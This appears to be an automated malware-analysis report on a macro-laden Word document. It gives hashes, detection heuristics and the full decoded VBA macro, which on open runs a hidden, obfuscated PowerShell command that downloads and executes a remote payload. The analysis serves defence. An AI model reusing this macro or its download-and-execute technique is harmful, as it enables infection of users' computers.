Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 9365ce79a51768a3…

Verdict: MALICIOUS
File type: Office (OOXML)
Size: 136.2 KB
Created: 2020-11-17 09:07:00 UTC
Authoring application: Microsoft Office Word 16.0000
First seen: 2020-11-23
MD5: 52745cd440eeba79d371ac0d736abee3
SHA-1: c49c44626b15c594608ae006d5e38a1bfcfa896f
SHA-256: 9365ce79a51768a398cc22ec701d5f256de827fbefed283c933dea4052d66027
Risk score: 118

Heuristics (6)

  • VBA project inside OOXML (severity: medium, 3 related findings, rule OOXML_VBA)
    Document contains a VBA project — VBA macros present
  • CreateObject call (severity: high, rule OLE_VBA_CREATEOBJ)
    CreateObject call
    Matched line in script
    Set objShell = CreateObject("Shell.Application")
  • VBA p-code auto-exec with execution tokens (severity: high, rule OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • AutoOpen macro (severity: low, rule OLE_VBA_AUTOOPEN)
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • External hyperlinks: 1 (severity: low, rule OOXML_EXTERNAL_HYPERLINKS)
    Document contains 1 external hyperlink — clickable URLs are stored as external relationships. First target: https://nationalinterest.org/blog/korea-watch/joe-bidens-north-korea-policy-will-put-allies-and-facts-first-167922
  • Embedded URL (severity: info, rule EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 2837 bytes
SHA-256: bea5eb9240d5ee9403efdf86f64bd0aa9e7fdc922139a3659c384a1b7c9dd0fe

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
Sub AutoOpen()
asfwefsadfasfsadf
asfwqfasfsdafas
sdfqefsdafsadfwqefsadf
eifhhdfasfiedf
End Sub

Function asfwefsadfasfsadf()
  Selection.Delete Unit:=wdCharacter, Count:=1
End Function

Function eifhhdfasfiedf()
Set objShell = CreateObject("Shell.Application")
Dim wrewsdfdsfsad As String
Dim uedjfjiefihsif(10) As String
wrewsdfdsfsad = "+e+z+p+e+z+o+e+z+w+e+z+e+e+z+r+e+z+s+e+z+h+e+z+e+e+z+l+e+z+l+e+z+.+e+z+e+e+z+x+e+z+e+e+z+"
wrewsdfdsfsad = Replace(wrewsdfdsfsad, "+e+z+", "")

uedjfjiefihsif(0) = "+e+z+[+e+z+s+e+z+t+e+z+r+e+z+i+e+z+n+e+z+g+e+z+]+e+z+$+e+z+a+e+z+=+e+z+{+e+z+(+e+z+N+e+z+"
uedjfjiefihsif(1) = "+e+z+e+e+z+w+e+z+-+e+z+O+e+z+b+e+z+j+e+z+e+e+z+c+e+z+t +e+z+N+e+z+e+e+z+t+e+z+.+e+z+W+e+z+e+e+z+b+e+z+C+e+z+l+e+z+i+e+z+"
uedjfjiefihsif(2) = "+e+z+e+e+z+n+e+z+t+e+z+)+e+z+.+e+z+D+e+z+o+e+z+y+e+z+e+e+z+k+e+z+s+e+z+l+e+z+e+e+z+i+e+z+s+e+z+l+e+z+i+e+z+n+e+z+g+e+z+"
uedjfjiefihsif(3) = "('h+e+z+t+e+z+t+e+z+p+e+z+:+e+z+/+e+z+/+e+z+p+e+z+e+e+z+l+e+z+e+e+z+b+e+z+r+e+z+a+e+z+.+e+z+a+e+z+t+e+z+w+e+z+e+e+z+b+e+z+p+e+z+a+e+z+g+e+z+e+e+z+s+e+z+.+e+z+c+e+z+o+e+z+m+e+z+/+e+z+b+e+z+r+e+z+/+e+z+ce+e+z+.+e+z+t+e+z+x+e+z+t')"
uedjfjiefihsif(4) = "+e+z+}+e+z+;+e+z+$+e+z+b+e+z+=+e+z+$+e+z+a+e+z+.+e+z+r+e+z+e+e+z+p+e+z+l+e+z+"
uedjfjiefihsif(5) = "+e+z+a+e+z+c+e+z+e+e+z+(+e+z+'+e+z+y+e+z+e+e+z+k+e+z+s+e+z+l+e+z+e+e+z+i+e+z+s+e+z+l+e+z+'+e+z+,+e+z+'+e+z+w+e+z+n+e+z+"
uedjfjiefihsif(6) = "+e+z+l+e+z+o+e+z+a+e+z+d+e+z+S+e+z+t+e+z+r+e+z+'+e+z+)+e+z+;+e+z+$+e+z+c+e+z+=+e+z+i+e+z+e+e+z+x+e+z+ +e+z+$+e+z+b+e+z+;+e+z+i+e+z+e+e+z+x +e+z+$+e+z+c+e+z+"
ueijfjdfijiewjddkfoi = Join(uedjfjiefihsif, "")
    ueijfjdfijiewjddkfoi = Replace(ueijfjdfijiewjddkfoi, "+e+z+", "")
objShell.ShellExecute wrewsdfdsfsad, ueijfjdfijiewjddkfoi, "", "open", 0
End Function

Function asfwqfasfsdafas()
    Selection.WholeStory
    With Selection.Font
        .NameFarEast = ""
        .NameAscii = ""
        .NameOther = ""
        .Name = ""
        .Hidden = False
    End With
End Function

Function sdfqefsdafsadfwqefsadf()
    With Selection.ParagraphFormat
        .LeftIndent = CentimetersToPoints(2)
        .SpaceBeforeAuto = True
        .SpaceAfterAuto = True
    End With
    With Selection.ParagraphFormat
        .RightIndent = CentimetersToPoints(2)
        .SpaceBeforeAuto = True
        .SpaceAfterAuto = True
    End With
    Selection.PageSetup.TopMargin = CentimetersToPoints(2.5)
    Selection.PageSetup.BottomMargin = CentimetersToPoints(2.5)
End Function

vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 25600 bytes
SHA-256: f2ca5abb4519e5b895d6d9a162ec0e4ff708487ce68eba73f9b1ed8cfbc34902